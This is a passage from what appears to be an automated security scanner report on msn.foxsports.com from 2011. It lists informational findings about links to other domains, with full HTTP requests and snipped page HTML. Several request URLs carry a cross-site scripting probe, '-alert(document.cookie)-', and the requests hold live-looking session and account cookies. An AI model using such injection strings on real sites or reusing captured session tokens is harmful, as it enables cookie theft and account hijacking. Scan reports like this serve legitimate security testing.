<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="FOX SPORTS SOUTHWEST">
                   
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/gasleak-pi_20110106172942297_196_100.JPG" class="story-image" width="196" height="100" alt="Drew Brees, New Orleans Saints" t
...[SNIP]...
</a>
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" class="story-blurb" title="Gas leak">
                           Saints' high-octane aerial assault doesn't resemble last season's
juggernaut.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.4. http://msn.foxsports.com/account/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li>
                       <a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li>
                       <a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li>
                       <a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li>
                       <a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.5. http://msn.foxsports.com/account/transition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 4257


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
</script>

   
           <script language="javascript" type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...

10.6. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244579
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=3
Date: Sat, 08 Jan 2011 01:12:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


